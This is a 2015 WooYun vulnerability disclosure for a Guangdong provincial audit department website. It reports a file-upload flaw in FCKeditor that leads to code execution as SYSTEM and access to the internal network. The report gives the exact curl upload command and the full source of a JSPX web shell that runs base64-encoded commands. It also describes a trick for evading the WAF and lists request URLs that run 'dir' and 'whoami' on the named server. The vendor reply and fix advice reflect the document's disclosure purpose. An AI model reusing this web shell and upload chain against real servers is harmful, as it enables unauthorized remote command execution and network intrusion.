当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104293

漏洞标题:广东省某政府网站存在漏洞可入内网

相关厂商:广东省某政府网站

漏洞作者: 路人甲

提交时间:2015-03-30 12:51

修复时间:2015-05-15 16:14

公开时间:2015-05-15 16:14

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-30: 细节已通知厂商并且等待厂商处理中
2015-03-31: 厂商已经确认,细节仅向厂商公开
2015-04-10: 细节向核心白帽子及相关领域专家公开
2015-04-20: 细节向普通白帽子公开
2015-04-30: 细节向实习白帽子公开
2015-05-15: 细节向公众公开

简要描述:

nt authority\system

详细说明:

出问题站点:广东省审计厅

http://www.gdaudit.gov.cn/


千言万语汇成一个命令:

curl "http://www.gdaudit.gov.cn/FCKeditor/editor/filemanager/upload/simpleuploader?Type=File" -F  NewFile=@/tmp/jspx64.jspx


对方服务器有WAF之类的防护设备,执行系统命令的时候可能被拦截。经过手工base64编码,然后到服务端去debase64即可轻松避开WAF的阻断。
附jspx内容:

<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
          xmlns="http://www.w3.org/1999/xhtml"
          xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
    <jsp:directive.page contentType="text/html" pageEncoding="gb2312"/>
    <jsp:directive.page import="java.io.*"/>
	<jsp:directive.page import="sun.misc.BASE64Decoder"/>
    <html>
        <head>
            <title>jspx</title>
        </head>
        <body>
            <jsp:scriptlet>
               try {
		BASE64Decoder decoder = new BASE64Decoder();
		String content=request.getParameter("tttt");
		String cmd = new String(decoder.decodeBuffer(content));
		if (cmd !=null){
			Process child = Runtime.getRuntime().exec(cmd);
			InputStream in = child.getInputStream();
			int c;
			while ((c = in.read()) != -1) {
			out.print((char)c);
			}
			in.close();
			try {
			child.waitFor();
			} catch (InterruptedException e) {
			e.printStackTrace();
		}
		}
		} catch (IOException e) {
		System.err.println(e);
		}
            </jsp:scriptlet>
        </body>
    </html>
</jsp:root>


gdsj1.png


存在waf

gdsj2.png


可绕过

http://www.gdaudit.gov.cn/userfiles/File/jspx64(1).jspx?tttt=Y21kIC9jIGRpciBkOlw%3D


debase64("Y21kIC9jIGRpciBkOlw=")="cmd /c dir d:\"

漏洞证明:

一句话jspx:

http://www.gdaudit.gov.cn/userfiles/File/jspx64(1).jspx?tttt=Y21kIC9jIGRpciBkOlw%3D


Tomcat权限:

http://www.gdaudit.gov.cn/userfiles/File/jspx64(1).jspx?tttt=d2hvYW1p


gdsj3.png


处于内网中

gdsj4.png

修复方案:

fck上传文件后缀进行白名单验证

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-03-31 16:13

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:13
正在联系相关网站管理单位处置。

最新状态:

暂无